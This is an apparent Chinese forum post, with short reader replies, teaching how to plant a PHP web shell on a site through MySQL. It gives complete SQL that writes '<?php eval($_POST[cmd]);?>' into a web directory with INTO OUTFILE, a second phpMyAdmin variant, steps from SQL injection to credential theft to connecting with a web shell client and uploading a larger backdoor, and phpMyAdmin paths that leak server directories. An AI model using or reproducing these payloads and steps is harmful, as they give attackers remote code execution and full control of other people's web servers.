通过mysql写入一句话木马

Jumbo

USE mysql;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
CREATE TABLE a(
cmd1 text NOT NULL
);# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。
INSERT INTO a( cmd1 )
VALUES (
'<?php eval($_POST[cmd]);?>'
);# 影响列数： 1
# 影响列数： 1
SELECT cmd1
FROM a
INTO OUTFILE '/data/www/heneng/cp/mm.php';# 影响列数： 1
# 影响列数： 1
DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。
# MySQL 返回的查询结果为空(即零行)。

1.首先通过注入获取mysql数据库的用户名和密码

2.通过相关渠道获取mysql数据库的路径

3.使用用户名和密码登陆mysql

4.获取网站可写目录的绝对路径

5.点击进入sql编辑器，输入上述代码，将一句话木马写入网站

6.使用菜刀连接一句话，上传大马



方法二：

使用phpmyadmin中的sql语句
写文件：
select '<?php @eval($_POST[1])?>' into outfile '/data/www/heneng/cp/log.php'
最后的/cp/log.php的文件名可以任意起的，不是固定的。



利用mysql数据库爆网站绝对路径方法

使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/libraries/select_lang.lib.php



参考：360搜索“mysql写入一句话木马文件”

帮你顶下哈！！

谢谢楼主，共同发展